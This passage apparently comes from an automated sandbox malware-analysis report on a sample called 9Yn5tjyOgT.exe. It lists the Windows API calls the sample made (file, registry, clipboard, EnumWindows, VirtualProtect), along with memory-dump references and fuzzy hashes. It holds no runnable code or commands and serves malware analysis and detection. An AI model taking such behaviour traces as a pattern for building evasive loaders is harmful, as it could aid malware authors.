                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2547128583-0
                                                                                                                    • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                    • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                    • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                    • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\9Yn5tjyOgT.exe,80000000,00000003), ref: 00405EE2
                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 415043291-0
                                                                                                                    • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                    • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                    • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                    • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                    APIs
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1375471231-0
                                                                                                                    • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                    • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                    • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                    • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                    APIs
                                                                                                                    • EnumWindows.USER32(00000000), ref: 738E2B6B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2811879470.00000000738E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738E0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2811849731.00000000738E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2811957570.00000000738E4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2812015914.00000000738E6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1129996299-0
                                                                                                                    • Opcode ID: 8a72493a7290609faa2382e0b3ecfef563ff4053806c3b982a96fb1e6c30d017
                                                                                                                    • Instruction ID: 766178456a3c610f880e44d686eb98d0718a97b571bae00991eb4e82e6f8adec
                                                                                                                    • Opcode Fuzzy Hash: 8a72493a7290609faa2382e0b3ecfef563ff4053806c3b982a96fb1e6c30d017
                                                                                                                    • Instruction Fuzzy Hash: DB416FB288060CDFEB31FFE9D942B5937BAFB46365F34852EE50986140D635D4908B91
                                                                                                                    APIs
                                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3562171763-0
                                                                                                                    • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                                    • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                                    • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                                    • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                      • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 327478801-0
                                                                                                                    • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                    • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                                    • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                    • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                                    APIs
                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                    • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                                    • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                    • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                                    APIs
                                                                                                                    • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                    • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                                    • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                    • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040EC01,0040CED0,004033DE,0040CED0,0040EC01,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                    • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                    • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                    • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(738E505C,00000004,00000040,738E504C), ref: 738E29B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2811879470.00000000738E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738E0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2811849731.00000000738E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2811957570.00000000738E4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2812015914.00000000738E6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 913cf32b261e088c3962d5ae7d2a8a1dd01427272a2f5e7ec53e8543fa089962
                                                                                                                    • Instruction ID: a3ae9e5651646a66211963306193a2975d584d487321d3b4e6e23c910325bf41
                                                                                                                    • Opcode Fuzzy Hash: 913cf32b261e088c3962d5ae7d2a8a1dd01427272a2f5e7ec53e8543fa089962
                                                                                                                    • Instruction Fuzzy Hash: 57F092F29C0A80DEC3A0EF6AC4447093BE1B709216B24472AF29CD6281E374C144CB91
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 71445658-0
                                                                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                    • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                    • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 973152223-0
                                                                                                                    • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                    • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                    • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                    • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                    • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                                    • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                    • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                      • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                    • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                    • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                    • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                    • CloseClipboard.USER32 ref: 00405912
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                    • String ID: (7B${
                                                                                                                    • API String ID: 590372296-525222780
                                                                                                                    • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                                    • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                                    • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                                    • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                    • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
